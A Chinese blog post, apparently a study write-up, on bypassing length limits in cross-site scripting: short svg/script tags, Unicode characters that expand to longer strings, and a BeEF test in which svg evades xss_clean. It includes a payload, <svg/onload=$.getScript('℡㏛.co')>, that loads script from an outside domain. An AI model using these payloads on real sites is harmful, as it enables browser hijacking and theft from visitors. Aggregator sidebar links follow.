当前位置:网站首页>限制字符绕过
限制字符绕过
2022-07-31 00:00:00 【Miracle_ze】
字符短域名绕过
一、绕过方法
1.1 重写,使用短标签
<svg/onload = ‘’ >
<script/ src = ’ ’ >
1.2 Unicode中多字符表示单字符
以下特殊字符会被html识别为单个字符
- ff expands to
ff- ℠ expands to
sm- ㏛ expands to
sr- st expands to
st- ㎭ expands to
rad- ℡ expands to
tel
1.3 实体编码html
二、限制长度短字符短域名绕过
2.1 xss_clean 过滤语句
使用beef工具开始尝试xss注入,首先使用基础语句实现弹窗<script>alert(1)</script>
添加结果:
由上图可见 被xss_clean过滤了注入失败。
为此我们删除xss_clean 来测试是否因为它而被过滤
结果表示xss_clean造成被过滤原因就是xss_clean
值得注意的是在当前xss_clean版本忽略了svg,为此我们可以使用svg注入
再次刷新页面同样显示
2.2
在观察前端引用文件时发现使用了jQuery
因此可以使用<svg/onload=$.getScript(‘℡㏛.co’)>注入,使用老师的telsr.co的域,是缩短了的即为5个字符。但是这个网站是老师提供的外网,我没有vpn因此选择了自己的。因此修改里字符限制长度
成功获取获取,在beef查看。
beef获取成功成功绕过。
三、kali的beef安装
边栏推荐
- joiplay模拟器如何导入游戏存档
- What are the efficient open source artifacts of VSCode
- Flex布局使用
- Apache Doris series: detailed steps for installation and deployment
- Steven Giesel recently published a 5-part series documenting his first experience building an application with the Uno Platform.
- what is jira
- joiplay模拟器rtp如何安装
- Shell脚本 if语句
- Summary of the stock problem of state machine dynamic programming
- 10 个关于自动化发布管理的好处
猜你喜欢
ctfshow 文件包含
【LeetCode】42. 接雨水 - Go 语言题解
HCIP Day 15 Notes
Summary of the stock problem of state machine dynamic programming
An easy-to-use interface testing tools - the Postman
2021GDCPC Guangdong University Student Programming Competition H.History
机器学习1一回归模型(二)
software development design process
transition过渡&&animation动画
uniapp开发微信小程序-软考刷题小程序
随机推荐
【LeetCode】70. 爬楼梯 - Go 语言题解
借助深度估计的点云场景重建
oracle数据库版本问题咨询(就是对比从数据库查询出来的版本,和docker里面的oracle版本)?
乌克兰外交部:乌已完成恢复粮食安全出口的必要准备
【飞控开发基础教程10】疯壳·开源编队无人机-PID 基础原理
2022 China Logistics Industry Conference and Entrepreneur Summit Forum will be held in Hangzhou!
[0x800706D9] solution appears in Microsoft Store
The first level must project independently
PyTorch model export to ONNX file example (LeNet-5)
joiplay模拟器rtp如何安装
HashSet源码解析
uniapp折叠框二级循环
A Brief Talk About MPI
Bugku sql注入
Introducing the visualization tool Netron
Machine Learning 1-Regression Model (2)
firewalld
Game mall table establishment
leetcode:127. Word Solitaire
Steven Giesel recently published a 5-part series documenting his first experience building an application with the Uno Platform.